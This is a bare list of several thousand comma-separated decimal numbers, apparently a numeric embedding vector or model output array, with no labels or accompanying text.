-0.03221355751156807, 0.050797201693058014, 0.005147010553628206, -0.005472725722938776, -0.010007678531110287, 0.014259868301451206, -0.004363147541880608, 0.0009646171238273382, 0.009599640034139156, 0.028161808848381042, -0.020616676658391953, 0.02370917797088623, 0.025856750085949898, 0.01251317746937275, -0.028849029913544655, 0.021175045520067215, 0.04046022891998291, 0.006403339561074972, -0.01779620163142681, -0.01214809063822031, 0.0034790642093867064, 0.00962111633270979, -0.0090341130271554, -0.02428186498582363, -0.012069346383213997, 0.012420115992426872, -0.028577005490660667, -0.018240032717585564, 0.02075984887778759, -0.016221316531300545, 0.0017824835376814008, -0.002142201643437147, -0.01687990501523018, -0.0002628536894917488, -0.008504379540681839, 0.036050550639629364, -0.04192057624459267, 0.03825538977980614, 0.03161223977804184, -0.01675105094909668, 0.01745259016752243, -0.01712329499423504, 0.02310785837471485, 0.0201728455722332, 0.0021243051160126925, -0.004921515937894583, 0.02007262594997883, 0.009971885941922665, 0.026629874482750893, -0.019729014486074448, -0.00009406806202605367, -0.008876624517142773, -0.013207558542490005, -0.014567687176167965, -0.00018757686484605074, 0.009406358934938908, 0.018941571936011314, -0.03055277094244957, -0.015347970649600029, -0.026815997436642647, -0.0033842131961137056, -0.010931134223937988, 0.026944851502776146, 0.008504379540681839, 0.009406358934938908, 0.02133253403007984, 0.02995144948363304, -0.025742212310433388, 0.01579180173575878, 0.014360087923705578, 0.00837552547454834, -0.04183467477560043, -0.03020915947854519, 0.02372349612414837, -0.011339172720909119, -0.010143691673874855, -0.011217476800084114, 0.0285340528935194, -0.0052901823073625565, 0.014803919941186905, 0.05414741113781929, -0.008282463997602463, -0.002020505955442786, 0.01862659491598606, 0.016965806484222412, 0.014252710156142712, -0.015061628073453903, 0.0272598285228014, 0.026930535212159157, -0.05016724765300751, -0.03247126564383507, -0.01994377188384533, -0.0001479810307500884, 0.01792505569756031, 0.0015847281320020556, -0.03410341963171959, -0.020502140745520592, -0.0201728455722332, -0.013823195360600948, -0.00849722046405077, -0.00006850974023109302, 0.015362287871539593, -0.014775285497307777, 0.014202599413692951, 0.01120315957814455, 0.031211357563734055, -0.006761267781257629, -0.018497740849852562, -0.005533573217689991, 0.026329215615987778, -0.017395321279764175, -0.010852389968931675, -0.02547018602490425, -0.0027005700394511223, 0.00313903228379786, 0.0123198963701725, 0.03464747220277786, 0.03301531821489334, -0.030352329835295677, 0.005802019499242306, 0.026629874482750893, 0.005537152756005526, -0.0034611679147928953, -0.0022835833951830864, 0.04083247482776642, 0.03441839665174484, -0.01958584412932396, -0.007190782111138105, -0.04544259235262871, -0.03410341963171959, 0.014016477391123772, 0.011518136598169804, 0.034275226294994354, -0.0064069186337292194, -0.039687104523181915, 0.032156288623809814, -0.0006156368763186038, 0.011747211217880249, -0.008103499189019203, -0.000172812317032367, -0.00931329745799303, 0.006804219447076321, -0.005930874031037092, -0.008482903242111206, -0.008833673782646656, 0.018855668604373932, -0.013579804450273514, 0.007409118115901947, -0.00820371974259615, -0.012198200449347496, 0.009699860587716103, 0.03407478705048561, -0.005136272870004177, -0.0030674466397613287, -0.008397000841796398, 0.026501020416617393, 0.00023891721502877772, 0.018555009737610817, 0.012112298049032688, 0.015834752470254898, 0.04696020856499672, 0.015433873981237411, -0.002004399197176099, -0.0005583683378063142, 0.02890629880130291, 0.01756712608039379, -0.013544011861085892, 0.0010612577898427844, -0.0024195960722863674, 0.014718016609549522, -0.020244430750608444, 0.00974281132221222, 0.01924223266541958, 0.0337025411427021, 0.004062487743794918, -0.00016218631935771555, 0.022005438804626465, 0.008597441017627716, -0.013171765953302383, 0.034847911447286606, -0.013923415914177895, 0.007502179592847824, 0.031554970890283585, -0.035220157355070114, 0.01673673279583454, 0.006095521152019501, 0.00018757686484605074, 0.02406710758805275, -0.03287214785814285, -0.017953690141439438, -0.032499901950359344, -0.04552849382162094, -0.013715817593038082, -0.009971885941922665, 0.0013807088835164905, 0.025198161602020264, -0.013322096318006516, 0.015849070623517036, -0.019056109711527824, -0.04744699224829674, -0.0019882924389094114, 0.0025573985185474157, -0.039572566747665405, 0.02086006850004196, 0.008933893404901028, -0.009048430249094963, -0.0023676964920014143, 0.003609708044677973, -0.004846350755542517, 0.02902083657681942, 0.01637880504131317, -0.02690190076828003, -0.005884343292564154, -0.01184743084013462, -0.010036312974989414, -0.013594121672213078, -0.028262028470635414, 0.04372453689575195, 0.013322096318006516, 0.009635433554649353, 0.008754929527640343, -0.002448230516165495, -0.03642279654741287, -0.011883223429322243, 0.010365607216954231, -0.018469106405973434, 0.010408558882772923, 0.01221251767128706, 0.005895080976188183, -0.0015131423715502024, -0.008482903242111206, 0.004971625749021769, 0.004889302421361208, -0.006553669460117817, 0.0434095598757267, -0.03796904534101486, 0.0066359927877783775, -0.0009449310600757599, -0.012176725082099438, -0.024210277944803238, -0.02028738334774971, 0.0024052790831774473, 0.01841183751821518, -0.03009462170302868, 0.0004232503706589341, 0.03304395079612732, 0.023451469838619232, 0.0012858578702434897, -0.03656596690416336, -0.017066027969121933, 0.010551730170845985, 0.02867722511291504, -0.007824315689504147, 0.014417356811463833, 0.019313817843794823, -0.020802799612283707, 0.008253829553723335, 0.0162785854190588, -0.03908578306436539, -0.005615897011011839, 0.01221251767128706, 0.021618876606225967, 0.018569326028227806, -0.02960783988237381, -0.030237793922424316, 0.02654397115111351, -0.01285678893327713, -0.026515336707234383, 0.02561335824429989, 0.022148611024022102, -0.014990041963756084, 0.0038119377568364143, 0.011632673442363739, -0.020487822592258453, -0.0067505300976336, -0.024797281250357628, -0.030237793922424316, 0.012849630787968636, -0.0063997600227594376, -0.0012205359525978565, -0.006217216607183218, -0.02147570624947548, 0.011818796396255493, 0.002963647246360779, -0.000673800241202116, -0.025441551581025124, 0.02217724546790123, 0.01735237054526806, -0.011840271763503551, -0.006807798519730568, -0.0008617126732133329, -0.0176816638559103, 0.023150810971856117, 0.0102152768522501, 0.03264307230710983, -0.0049358331598341465, 0.007716936990618706, -0.019986722618341446, -0.039687104523181915, -0.010716376826167107, -0.008933893404901028, 0.001972185680642724, -0.009513737633824348, 0.020960288122296333, -0.009957568719983101, 0.008754929527640343, -0.022506538778543472, 0.025856750085949898, 0.01945698820054531, -0.017280783504247665, -0.0077742054127156734, -0.0029457509517669678, -0.00867618527263403, 0.007938852533698082, -0.015720216557383537, 0.017266467213630676, -0.01735237054526806, -0.03925758972764015, 0.0406033992767334, 0.05354609340429306, -0.0006281643873080611, 0.02995144948363304, 0.0029117476660758257, 0.009012637659907341, 0.002668356290087104, -0.006238692440092564, 0.010823755525052547, -0.018798401579260826, 0.007946010679006577, -0.000982513534836471, 0.00713351322337985, -0.02110346034169197, 0.02912105619907379, -0.009885982610285282, -0.003140821820124984, -0.06207910552620888, 0.006038252264261246, -0.003371685743331909, -0.007602399680763483, -0.0019113377202302217, 0.035821475088596344, -0.005963087547570467, -0.0034951709676533937, -0.01309302169829607, 0.0009024270111694932, -0.001879124203696847, -0.007122775539755821, 0.007702619768679142, 0.000250102486461401, 0.04933685436844826, -0.02617172710597515, -0.017753249034285545, 0.004560008179396391, -0.01504731085151434, 0.011682783253490925, -0.00014786918472964317, -0.006539352238178253, -0.014632114209234715, 0.002990491921082139, 0.0001814249699236825, -0.0417487695813179, -0.04023115336894989, 0.012964167632162571, 0.014689382165670395, -0.023880984634160995, 0.01686558686196804, -0.0023587483447045088, -0.001997240586206317, -0.022477904334664345, -0.014803919941186905, 0.004993101581931114, -0.02133253403007984, 0.0022102079819887877, 0.025556089356541634, 0.038054950535297394, -0.01043003425002098, -0.023050589486956596, 0.006890122313052416, 0.023408519104123116, 0.008218036964535713, -0.015247751027345657, -0.04360999912023544, 0.018325936049222946, 0.015548410825431347, -0.04137652739882469, 0.013214717619121075, 0.013214717619121075, 0.049021877348423004, 0.01912769488990307, -0.0003858915879391134, -0.021876584738492966, -0.006786322686821222, -0.016836952418088913, -0.005594421178102493, -0.012885423377156258, -0.02998008392751217, -0.012563287280499935, 0.016965806484222412, -0.012670665979385376, -0.007205099333077669, 0.018683863803744316, -0.0042879823595285416, 0.0201728455722332, -0.006045410875231028, -0.015577045269310474, -0.0004438312316779047, -0.03908578306436539, -0.02665850892663002, -0.021389802917838097, -0.017624394968152046, 0.036021918058395386, 0.011632673442363739, -0.02547018602490425, 0.01639312133193016, 0.014675064943730831, -0.03278624266386032, 0.006682523526251316, 0.04575756937265396, -0.03221355751156807, -0.0036974006798118353, -0.018311617895960808, -0.008418476209044456, 0.013708658516407013, 0.01968606375157833, -0.009642591699957848, 0.017495540902018547, -0.025928335264325142, 0.011410757899284363, 0.01935676857829094, 0.013422315940260887, 0.013279144652187824, -0.022134292870759964, 0.013995001092553139, 0.037711337208747864, -0.016235632821917534, -0.003869206178933382, -0.016951490193605423, -0.027188243344426155, -0.007129934150725603, 0.026715777814388275, 0.0019578684587031603, 0.013085863552987576, -0.01947130635380745, 0.02960783988237381, 0.02786114811897278, -0.021890902891755104, -0.014582003466784954, -0.0026450911536812782, -0.0010496251052245498, -0.008740612305700779, 0.009341931901872158, 0.0014916666550561786, 0.00012214307207614183, -0.024038473144173622, 0.005036052782088518, 0.022792881354689598, -0.019986722618341446, 0.002904589055106044, 0.00043667267891578376, 0.0011901119723916054, 0.035076986998319626, -0.023093542084097862, -0.018454790115356445, -0.002108198357746005, -0.009628274478018284, 0.011446550488471985, -0.026042871177196503, -0.0078099980019032955, -0.015247751027345657, 0.0073196361772716045, 0.03433249518275261, 0.0038011998403817415, -0.03991617634892464, -0.024639792740345, 0.025756528601050377, -0.006124155130237341, -0.030810479074716568, 0.010079264640808105, -0.02077416516840458, 0.006789902225136757, 0.022434953600168228, -0.002373065333813429, 0.04048886150121689, -0.013035752810537815, -0.003618656424805522, 0.03882807493209839, 0.030581403523683548, 0.039572566747665405, 0.003087132703512907, -0.017266467213630676, -0.023422835394740105, -0.004051749594509602, -0.0006116101867519319, 0.020731214433908463, -0.015462507493793964, -0.0001323216565651819, 0.017080344259738922, 0.01326482743024826, 0.003908578306436539, -0.010251070372760296, -0.019084744155406952, 0.01826866716146469, 0.006152789574116468, -0.0021296741906553507, 0.017724614590406418, -0.021432753652334213, -0.034991081804037094, 0.0047174966894090176, 0.03822675719857216, 0.000993251334875822, -0.004384623374789953, -0.012878264300525188, -0.026758728548884392, -0.00002866223621822428, 0.01002915482968092, 0.008547330275177956, 0.006224375218153, -0.020230114459991455, 0.008461427874863148, -0.031440433114767075, 0.015992240980267525, -0.016593562439084053, -0.010100740008056164, -0.028004320338368416, -0.010888182558119297, -0.020473506301641464, 0.0031694562640041113, 0.003747510490939021, -0.006152789574116468, -0.004438312258571386, 0.007187202572822571, -0.03315848857164383, -0.009957568719983101, -0.014789602719247341, -0.007931693457067013, -0.007509338203817606, -0.008339731954038143, -0.003983743488788605, -0.009105699136853218, 0.011403599753975868, -0.004144811071455479, -0.0018809138564392924, 0.028004320338368416, -0.027574805542826653, -0.015491141937673092, 0.0049537294544279575, -0.010379924438893795, -0.014596320688724518, -0.00563379330560565, 0.02770365960896015, -0.021275265142321587, 0.014109537936747074, -0.02007262594997883, -0.0008290517143905163, -0.006743371486663818, -0.0271309744566679, 0.015190482139587402, -0.019900821149349213, -0.01143939234316349, -0.01539092231541872, -0.007337532471865416, -0.011224634945392609, 0.011518136598169804, 0.02110346034169197, 0.02536996640264988, 0.09747106581926346, -0.009298980236053467, 0.006775585003197193, 0.008883783593773842, -0.005393981467932463, -0.002458968199789524, 0.017953690141439438, 0.0043703061528503895, 0.026830313727259636, -0.005737592466175556, 0.01066626701503992, 0.01539092231541872, -0.005522835534065962, 0.0038620475679636, -0.003105028998106718, 0.03384571149945259, -0.019313817843794823, -0.01947130635380745, 0.014961408451199532, -0.0157058984041214, 0.0016258899122476578, 0.0029457509517669678, -0.0006925914785824716, -0.00022706083836965263, 0.032242193818092346, -0.0038978406228125095, -0.005830653943121433, -0.038770806044340134, -0.04816284775733948, -0.011818796396255493, 0.013493901118636131, 0.010308338329195976, 0.004416836891323328, -0.017423955723643303, -0.0036938213743269444, 0.020001040771603584, 0.02960783988237381, 0.028992202132940292, -0.007291001733392477, -0.03407478705048561, -0.001802169601432979, -0.02312217652797699, -0.037339091300964355, 0.004116176627576351, -0.006478504277765751, 0.00819656066596508, -0.014066587202250957, -0.0017833783058449626, -0.019643111154437065, -0.009213077835738659, -0.010336972773075104, -0.020115576684474945, 0.020373286679387093, 0.012119456194341183, -0.010236753150820732, 0.012591921724379063, -0.014023635536432266, -0.025899700820446014, -0.006116996519267559, 0.005776964593678713, 0.0027435212396085262, 0.0019363927422091365, -0.015362287871539593, -0.0038298340514302254, -0.008898100815713406, -0.008210877887904644, -0.03018052503466606, 0.021561607718467712, -0.015362287871539593, 0.022363368421792984, 0.01888430304825306, 0.013816037215292454, -0.023036273196339607, 0.0003997613093815744, -0.014481783844530582, -0.028949251398444176, -0.006002459675073624, 0.012026394717395306, -0.03908578306436539, -0.010344131849706173, -0.0015659368364140391, 0.012957008555531502, 0.008482903242111206, 0.007298160344362259, -0.015977924689650536, 0.02786114811897278, -0.005136272870004177, 0.004846350755542517, 0.0005825285334140062, 0.006385443266481161, -0.02466842718422413, -0.007022555451840162, 0.0224063191562891, 0.0012679614592343569, -0.0005516571691259742, 0.030839113518595695, -0.0006899070576764643, 0.004713917151093483, -0.04129062220454216, -0.02499772049486637, 0.00657872436568141, 0.009041272103786469, 0.012434433214366436, 0.019041791558265686, -0.026486704126000404, -0.004792661406099796, -0.003858468495309353, -0.004728234373033047, -0.009871666319668293, -0.0006098205340094864, -0.011553929187357426, 0.0056051588617265224, 0.006020355969667435, 0.010830913670361042, -0.015347970649600029, 0.020344652235507965, 0.004237872548401356, -0.01009358186274767, -0.008296781219542027, -0.02499772049486637, -0.02097460627555847, 0.021547291427850723, 0.029922816902399063, -0.023852350190281868, 0.0039049990009516478, -0.004101859871298075, 0.037797242403030396, -0.004781923722475767, 0.023995520547032356, -0.0011247900547459722, 0.004359568003565073, 0.0002767234109342098, 0.00826098769903183, 0.001191006856970489, -0.0013484953669831157, -0.018211398273706436, 0.03633689507842064, -0.0010961558436974883, -0.010072105564177036, 0.0052508101798594, -0.0047604478895664215, 0.03645142912864685, -0.01759576052427292, -0.015190482139587402, -0.0020956709049642086, -0.013952050358057022, 0.009449310600757599, -0.005723275244235992, 0.011961967684328556, 0.015276385471224785, 0.013794561848044395, -0.02902083657681942, 0.022363368421792984, 0.030724575743079185, 0.019385403022170067, -0.010394241660833359, 0.034876544028520584, -0.0016402070177718997, -0.0033806338906288147, 0.02597128599882126, 0.009349090047180653, -0.0020384022500365973, 0.00938488356769085, -0.011281903833150864, 0.01056604739278555, 0.033673904836177826, -0.019628794863820076, -0.033215757459402084, -0.008003279566764832, 0.0021028295159339905, 0.03610781952738762, -0.00997904408723116, -0.006997500546276569, -0.0028866927605122328, 0.013300620019435883, 0.007233733311295509, -0.007004659157246351, 0.016965806484222412, 0.010365607216954231, -0.032242193818092346, 0.00035032242885790765, -0.01180447917431593, 0.015204799361526966, 0.004191341809928417, 0.0025896120350807905, -0.013901939615607262, -0.012541811913251877, 0.010408558882772923, -0.06213637441396713, 0.016951490193605423, 0.012133773416280746, 0.013916256837546825, 0.0035434914752840996, -0.010866707190871239, 0.014309978112578392, -0.034618835896253586, 0.006295960862189531, -0.01805390976369381, 0.0008321835775859654, -0.012427275069057941, -0.02582811564207077, -0.0400879830121994, -0.007018976379185915, 0.002122515579685569, -0.0006438237614929676, -0.040746573358774185, -0.011725734919309616, 0.010838072746992111, -0.0057805441319942474, 0.006371126044541597, 0.004513477440923452, -0.024596842005848885, 0.003042391501367092, -0.012928375042974949, 0.03788314387202263, -0.0027936312835663557, -0.018798401579260826, -0.017524175345897675, -0.0034468506928533316, -0.0034826435148715973, 0.005912977736443281, 0.007101299706846476, -0.020316017791628838, -0.005297340452671051, -0.00991461705416441, 0.004205659031867981, 0.029550570994615555, -0.020588042214512825, 0.008575964719057083, -0.001430818811058998, -0.031182724982500076, 0.0011695311404764652, 0.00580559903755784, 0.015605678781867027, 0.0048177167773246765, -0.006310278084129095, 0.02620035968720913, 0.017767567187547684, -0.01759576052427292, 0.012477384880185127, 0.006020355969667435, 0.010365607216954231, -0.02572789415717125, -0.011940492317080498, -0.0006925914785824716, -0.00020066362048964947, 0.019743332639336586, 0.033559367060661316, -0.004230713937431574, 0.007996120490133762, -0.025541773065924644, 0.005529994145035744, 0.0028849029913544655, -0.011002719402313232, 0.0020133473444730043, -0.006954549346119165, -0.007666826713830233, -0.010895341634750366, -0.028834713622927666, 0.0038942613173276186, 0.04383907467126846, -0.009341931901872158, 0.0010532044107094407, 0.03327302634716034, -0.009012637659907341, 0.019328134134411812, -0.0016795791452750564, -0.00120174465700984, 0.009363407269120216, 0.005723275244235992, 0.02159024216234684, 0.016808317974209785, 0.006775585003197193, 0.00728742266073823, 0.006997500546276569, -0.0024016997776925564, -0.009764287620782852, -0.005028894171118736, -0.00856164749711752, 0.00013310463691595942, -0.01497572474181652, 0.02276424691081047, 0.019056109711527824, -0.034991081804037094, 0.0034200060181319714, -0.012949850410223007, -0.020702579990029335, 0.0089052589610219, -0.005855708848685026, -0.005945191252976656, 0.011868906207382679, -0.01675105094909668, 0.005021735560148954, -0.03748226538300514, 0.023737812414765358, 0.0063997600227594376, -0.017896421253681183, 0.028519736602902412, 0.017080344259738922, 0.01676536723971367, -0.004309458192437887, 0.00808918196707964, 0.003908578306436539, 0.00131986103951931, 0.008833673782646656, -0.02054509148001671, -0.022506538778543472, -0.0002462994889356196, 0.0028974306769669056, 0.01851205714046955, -0.00634249160066247, 0.01180447917431593, -0.02902083657681942, -0.005730433855205774, 0.011725734919309616, -0.024897500872612, -0.01676536723971367, 0.0035757049918174744, -0.02074553072452545, -0.002142201643437147, 0.01019380148500204, -0.025742212310433388, -0.013050070032477379, -0.013386523351073265, -0.01637880504131317, 0.004212817642837763, -0.012427275069057941, -0.017853470519185066, -0.009800080209970474, -0.021618876606225967, 0.017008759081363678, 0.012727934867143631, 0.029579205438494682, -0.007194361183792353, -0.0017252149991691113, 0.008812197484076023, 0.002628984162583947, -0.011188842356204987, 0.00010167404252570122, 0.018784083425998688, -0.048907339572906494, 0.02348010428249836, -0.001462137559428811, -0.017538493499159813, 0.011933333240449429, -0.0025681364350020885, 0.02041623741388321, 0.0013493901351466775, -0.009764287620782852, -0.026830313727259636, -0.007924535311758518, -0.007323215715587139, -0.018010959029197693, -0.0049966806545853615, 0.0047425515949726105, -0.010286862961947918, 0.005286602769047022, 0.011625515297055244, 0.027202559635043144, -0.03931485861539841, -0.0014469256857410073, -0.021747730672359467, -0.002725624945014715, 0.015662947669625282, 0.0017619027057662606, -0.03962983563542366, -0.007480704225599766, 0.009170126169919968, 0.003912157844752073, -0.007931693457067013, -0.0013610228197649121, -0.012298421002924442, 0.021762048825621605, 0.013665706850588322, -0.003990902099758387, 0.005182803608477116, 0.016908539459109306, -0.03653733432292938, -0.012584763579070568, 0.01326482743024826, -0.016350170597434044, 0.005272285547107458, -0.0010818386217579246, 0.008726295083761215, -0.0016938962507992983, 0.009871666319668293, -0.015118896961212158, 0.011353489942848682, -0.01604950986802578, -0.012835313566029072, 0.01665082946419716, 0.03905715048313141, 0.02276424691081047, 0.023064907640218735, -0.0010299390414729714, -0.007559448480606079, -0.002469706116244197, 0.011432234197854996, -0.020029675215482712, -0.0029153269715607166, 0.003876364789903164, -0.02703075483441353, -0.02654397115111351, 0.013959208503365517, 0.021189361810684204, -0.003969426266849041, 0.0027757349889725447, -0.01815412938594818, 0.019041791558265686, -0.02736004814505577, 0.005436932668089867, -0.0074377525597810745, -0.0018988102674484253, -0.010616157203912735, -0.023852350190281868, 0.0035971805918961763, -0.017295101657509804, 0.02405278943479061, 0.017910737544298172, -0.021547291427850723, -0.005297340452671051, 0.004438312258571386, 0.009993361309170723, -0.00843995250761509, -0.03539196401834488, -0.029521936550736427, 0.0026826735120266676, -0.01685127057135105, -0.019857868552207947, 0.008361208252608776, -0.00967838428914547, -0.01150381937623024, 0.0017475854838266969, 0.006807798519730568, 0.034275226294994354, -0.008461427874863148, -0.01373729296028614, -0.0014012897154316306, -0.032242193818092346, 0.008754929527640343, 0.0077742054127156734, 0.004180604126304388, 0.012069346383213997, -0.002768576378002763, 0.003858468495309353, -0.008461427874863148, -0.017738932743668556, -0.011553929187357426, -0.01663651317358017, -0.008633233606815338, 0.026758728548884392, -0.0009158493485301733, 0.00522575480863452, 0.012198200449347496, 0.008618916384875774, -0.00908422376960516, 0.007659668102860451, 0.006646730937063694, 0.011360648088157177, -0.0019435513531789184, 0.015433873981237411, -0.023780765011906624, 0.018010959029197693, -0.004656648728996515, 0.023150810971856117, 0.021876584738492966, 0.007351849693804979, 0.0011516347294673324, -0.017524175345897675, -0.004942991305142641, 0.02274993062019348, 0.005533573217689991, 0.01829730160534382, -0.015032993629574776, 0.029464667662978172, 0.005447670817375183, -0.00796748697757721, -0.02088870294392109, -0.012348530814051628, 0.012233993038535118, -0.009284663014113903, 0.01912769488990307, -0.01386614702641964, -0.0034808539785444736, -0.01637880504131317, 0.019027475267648697, -0.0007999700028449297, -0.002374855102971196, 0.010301180183887482, -0.01002199575304985, -0.0002581558655947447, -0.001246485742740333, 0.009477945044636726, -0.00046799139818176627, 0.02313649281859398, 0.022119976580142975, 0.004928674548864365, 0.016822636127471924, 0.020502140745520592, -0.007423435337841511, -0.006997500546276569, -0.01865522935986519, -0.0001300846051890403, 0.008246670477092266, -0.008769246749579906, -0.003606128739193082, -0.013307779096066952, 0.00032482005190104246, 0.007616716902703047, -0.002348010428249836, 0.00204914016649127, -0.008060548454523087, -0.0031318736728280783, 0.00019887398229911923, -0.020831434056162834, 0.009900299832224846, -0.001024570083245635, 0.008117816410958767, -0.022248830646276474, 0.009120016358792782, 0.0009467206546105444, 0.00030043616425246, 0.012506019324064255, -0.022234514355659485, -0.005945191252976656, 0.014639272354543209, 0.03527742624282837, 0.007097720634192228, -0.0015059838769957423, -0.030839113518595695, 0.004041011910885572, 0.00005287833118927665, -0.00615994818508625, -0.006120576057583094, 0.008711977861821651, -0.011425075121223927, 0.03410341963171959, -0.015505459159612656, -0.012069346383213997, -0.015376605093479156, 0.01898452267050743, 0.0060525694862008095, -0.02642943523824215, 0.023651910945773125, 0.007802839390933514, -0.00225852825678885, 0.002315796911716461, -0.01427418552339077, -0.00813213363289833, 0.005809178110212088, 0.007953169755637646, 0.0038298340514302254, 0.011546771042048931, 0.007466387003660202, 0.009127174504101276, -0.013050070032477379, -0.007702619768679142, -0.007394801359623671, 0.00991461705416441, -0.002906378824263811, 0.011339172720909119, 0.015462507493793964, 0.018569326028227806, 0.02146138809621334, 0.00884799100458622, 0.015262068249285221, -0.004749710205942392, -0.0077742054127156734, -0.0007722305599600077, -0.012949850410223007, 0.005648110527545214, 0.001778009464032948, 0.0003858915879391134, 0.013150290586054325, -0.0036723455414175987, 0.0009556688601151109, 0.012706458568572998, -0.014660747721791267, 0.024095742031931877, 0.008711977861821651, 0.007530814036726952, 0.002177994465455413, -0.008017596788704395, -0.023537373170256615, -0.012534653767943382, -0.028104539960622787, 0.011582563631236553, -0.01947130635380745, -0.0027309937868267298, 0.00442399550229311, -0.004781923722475767, -0.009327614679932594, -0.014846870675683022, 0.007545131258666515, -0.009871666319668293, 0.006167106796056032, -0.020945971831679344, -0.0021941012237221003, -0.0023533792700618505, 0.013952050358057022, 0.014324295334517956, 0.00025502400239929557, 0.008289622142910957, 0.00036620552418753505, 0.0016581034287810326, -0.0010084633249789476, 0.024854550138115883, -0.010179484263062477, 0.015176164917647839, -0.007795681245625019, 0.009256028570234776, -0.0006899070576764643, -0.007559448480606079, -0.004781923722475767, -0.010709218680858612, -0.00669684074819088, -0.003983743488788605, -0.012370006181299686, 0.0014773495495319366, -0.033788442611694336, 0.004889302421361208, -0.007795681245625019, -0.00545124989002943, -0.012477384880185127, 0.014395881444215775, -0.0003237015043850988, -0.008998320437967777, -0.022907419130206108, 0.010530253872275352, 0.03278624266386032, 0.0011561088031157851, -0.0013520746724680066, -0.0036795041523873806, 0.014596320688724518, -0.007716936990618706, 0.026458069682121277, -0.007652509491890669, 0.00954953022301197, -0.015405239537358284, -0.018583644181489944, 0.007187202572822571, -0.008547330275177956, -0.01322187576442957, -0.02559904009103775, -0.02038760297000408, 0.011110098101198673, 0.009227395057678223, -0.004338092636317015, 0.02193385362625122, 0.029464667662978172, -0.015577045269310474, 0.02064531110227108, -0.0271309744566679, 0.009413517080247402, -0.0025448710657656193, -0.009019795805215836, -0.008031914010643959, 0.012090821750462055, 0.018597960472106934, 0.010000520385801792, 0.010344131849706173, 0.011417916975915432, -0.00545124989002943, 0.00873345322906971, -0.0031658769585192204, -0.013178924098610878, -0.017023075371980667, 0.004245031159371138, 0.002111777663230896, 0.018841352313756943, 0.011246111243963242, -0.0028526894748210907, -0.012062188237905502, -0.012162407860159874, 0.0011417916975915432, -0.009499420411884785, 0.0038334133569151163, -0.006510717794299126, 0.01805390976369381, 0.013472425751388073, -0.019729014486074448, -0.0007619401440024376, -0.004477684386074543, -0.002473285421729088, 0.0008567911572754383, 0.0007789417286403477, 0.003962267655879259, -0.005880763754248619, -0.0005257073789834976, -0.0035238054115325212, 0.009800080209970474, 0.010866707190871239, 0.0031551390420645475, -0.011396440677344799, -0.008182243444025517, -0.05297340825200081, -0.018254349008202553, -0.0008321835775859654, -0.011926175095140934, 0.008082023821771145, 0.01015084981918335, -0.014875505119562149, -0.004492001608014107, -0.004481263924390078, 0.0009252449963241816, 0.001462137559428811, 0.006285223178565502, 0.020917337387800217, 0.02264971099793911, -0.004159128293395042, 0.02547018602490425, 0.01302859466522932, 0.0028401620220392942, 0.011833113618195057, -0.0038298340514302254, 0.02124663069844246, 0.016436073929071426, 0.009184443391859531, 0.015662947669625282, -0.00480697862803936, -0.03009462170302868, -0.0014299240428954363, 0.0027721556834876537, -0.04180603846907616, 0.02783251367509365, 0.014431674033403397, 0.0006044516339898109, -0.009764287620782852, -0.029865548014640808, -0.008046231232583523, 0.022091342136263847, 0.015075945295393467, 0.032242193818092346, -0.009213077835738659, -0.000021545612980844453, 0.004692441783845425, 0.024339132010936737, -0.0201728455722332, -0.010537412948906422, -0.015577045269310474, 0.02889198251068592, 0.01945698820054531, -0.008382683619856834, -0.0007767046918161213, -0.006242271512746811, 0.001149845076724887, -0.002118936274200678, -0.007946010679006577, -0.01410237979143858, 0.013057229109108448, -0.012069346383213997, 0.014467466622591019, -0.028004320338368416, -0.0008165242034010589, 0.01968606375157833, -0.021175045520067215, -0.016221316531300545, 0.009971885941922665, -0.005912977736443281, -0.006374705117195845, 0.0055192564614117146, 0.022950369864702225, 0.00018243164231535047, 0.028032954782247543, 0.014560528099536896, 0.014567687176167965, 0.007305318955332041, 0.006786322686821222, -0.024339132010936737, -0.008397000841796398, 0.0017717457376420498, -0.0004747025668621063, 0.015648631379008293, -0.00215293955989182, 0.008189402520656586, 0.00036128400824964046, -0.009807238355278969, -0.02064531110227108, -0.0016965806717053056, -0.019514257088303566, 0.014589162543416023, -0.0011453710030764341, -0.016808317974209785, 0.0077240951359272, 0.024110058322548866, -0.0002111777721438557, -0.004148390609771013, -0.017538493499159813, 0.008583123795688152, -0.029751010239124298, 0.007248050533235073, 0.0034736953675746918, 0.017295101657509804, -0.014990041963756084, -0.01792505569756031, -0.008697660639882088, 0.01590633951127529, -0.01539092231541872, 0.004617276601493359, -0.02041623741388321, -0.020588042214512825, -0.037797242403030396, -0.02038760297000408, -0.009764287620782852, 0.018941571936011314, 0.01593497395515442, 0.01604950986802578, 0.0032839933410286903, 0.0033466308377683163, -0.00028925089281983674, -0.018311617895960808, 0.009162968024611473, -0.0028938513714820147, 0.020588042214512825, -0.00395152997225523, -0.004495581146329641, -0.012255469337105751, 0.008783563040196896, 0.036852311342954636, 0.0026755149010568857, -0.009456468746066093, -0.00920591875910759, 0.004613697528839111, 0.00931329745799303, -0.009928934276103973, -0.021518656983971596, -0.010752169415354729, -0.009656908921897411, 0.013844671659171581, -0.015877705067396164, -0.0006102679762989283, -0.0018397520761936903, -0.0003867864143103361, 0.0018737552454695106, -0.03235672786831856, -0.02806158922612667, -0.02406710758805275, -0.02133253403007984, -0.011317696422338486, -0.012656348757445812, -0.011210317723453045, 0.006410498172044754, 0.010608998127281666, 0.01345810852944851, -0.011561088263988495, -0.01390909869223833, -0.005590842105448246, -0.00866902619600296, -0.019414037466049194, -0.023150810971856117, 0.010358448140323162, -0.009363407269120216, -0.0023086383007466793, 0.024453669786453247, 0.011718576774001122, 0.0100864227861166, 0.020459188148379326, -0.03066730685532093, -0.03527742624282837, -0.011697100475430489, 0.013601279817521572, -0.0003149770200252533, 0.010830913670361042, -0.015505459159612656, 0.0004751499800477177, -0.000917191558983177, -0.007190782111138105, 0.012012077495455742, -0.007996120490133762, -0.009728494100272655, 0.03831265866756439, 0.004277244675904512, -0.017653029412031174, 0.026973485946655273, 0.013944891281425953, 0.001966816606000066, -0.015977924689650536, 0.000878714257851243, -0.032270826399326324, -0.007652509491890669, 0.02263539284467697, -0.01875544898211956, -0.011496661230921745, -0.012992802076041698, 0.008661868050694466, -0.014947091229259968, 0.02086006850004196, -0.0008782668737694621, -0.004631593823432922, -0.0179393719881773, -0.011475184932351112, 0.007824315689504147, -0.014073745347559452, 0.032013118267059326, 0.030495502054691315, -0.00873345322906971, 0.008654708974063396, 0.004112597554922104, 0.03564967215061188, 0.013164607807993889, -0.0070655071176588535, 0.00522575480863452, 0.014302819967269897, 0.014281343668699265, 0.002118936274200678, 0.02322239615023136, 0.0039049990009516478, -0.025298381224274635, -0.0007941536605358124, 0.015075945295393467, 0.0054870424792170525, 0.012706458568572998, 